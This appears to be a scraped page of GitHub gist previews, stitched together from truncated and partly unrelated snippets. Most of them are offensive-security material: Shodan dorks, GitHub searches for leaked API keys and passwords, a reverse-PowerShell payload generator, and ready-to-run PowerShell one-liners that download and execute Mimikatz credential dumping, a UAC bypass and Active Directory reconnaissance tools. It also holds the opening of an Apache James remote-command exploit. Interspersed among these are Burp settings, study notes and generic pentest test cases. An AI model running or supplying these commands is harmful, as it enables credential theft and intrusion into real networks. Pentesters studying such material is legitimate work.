p3rzv41 epicn1337
hostname:target.com | to find all assets available for target.com on Shodan
http.title:"title" | to find server/host with similar title
http.html:"/file" | to find server/host with similar path
html:"context" | to find server/host with similar string
server: "apache 2.2.3" | to find server/host with same server
port:80 | to find server/host with same port
os:"windows" | to find server/host with same OS
asn:AS3214 | to find host/server with matched ASN
http.status:200 | to find server/host with 200 HTTP response code
http.favicon.hash:"hash" | to find server/host with same favicon hash
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
@nullenc0de
nullenc0de / auto_git_query
Last active June 23, 2024 21:16
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active May 21, 2024 08:42
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@sudomain
sudomain / LHTL notes
Last active December 13, 2023 16:48
Notes from Learning How to Learn MOOC
*Original instruction material by Dr. Barbara Oakley and Dr. Terrence Sejnowski as part of their MOOC "Learning How to Learn" available via Coursera (August 2017)
*Notes by Amir Saleh (not me) who shared his notes accessible via the discussion forums (https://docs.google.com/document/d/1GVYaVOVT2G9MS6ku6tLjhvoMazh7rWdqUu0Kts5C3Fc/edit)
*Reproduced per the paraphrasing rule outlined in the course FAQ:
*"We're often asked whether it's okay to use illustrations or quoted material from the course or book in your final project. It's perfectly possible to use illustrations from the course or book, but please cite where you got them, with the copyright information. If you quote anything from the video clips or the book A Mind for Numbers, you'll put it in quotation marks and cite where you got it. If you paraphrase information from the video clips or A Mind for Numbers--that is, you put things in your own words--then there's no need to put in a reference, although it would be nice to put some sort of general referenc
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 28, 2024 00:59
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@numberwhun
numberwhun / Penetration testing sample test cases
Created July 2, 2016 03:21
Penetration testing sample test cases
Penetration testing sample test cases (test scenarios):
Remember this is not functional testing. In a pentest your goal is to find security holes in the system. Below are some generic test cases, not necessarily applicable to all applications.
1) Check if the web application is able to identify spam attacks on contact forms used on the website.
2) Proxy server – Check whether network traffic is monitored by proxy appliances. A proxy server makes it difficult for attackers to obtain internal details of the network, thus protecting the system from external attacks.
3) Spam email filters – Verify that incoming and outgoing email traffic is filtered and unsolicited emails are blocked. Many email clients come with built-in spam filters which need to be configured to your needs. These configuration rules can be applied to email headers, subject or body.
4) Firewall – Make sure the entire network or computers are protected with a firewall. A firewall can be software or hardware that blocks unauthorized access to a system. Firewall can p
@kjiwa
kjiwa / apache-james-exploit.py
Last active December 8, 2022 08:50
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html
"""An exploit for Apache James 2.3.2 that executes remote commands.
This script creates a new user and enqueues a payload to be executed the next
time a user logs in to the machine. The vulnerability is documented in
CVE-2015-7611.
For more details, see http://www.securityfocus.com/bid/76933 and
https://www.exploit-db.com/exploits/35513/.
"""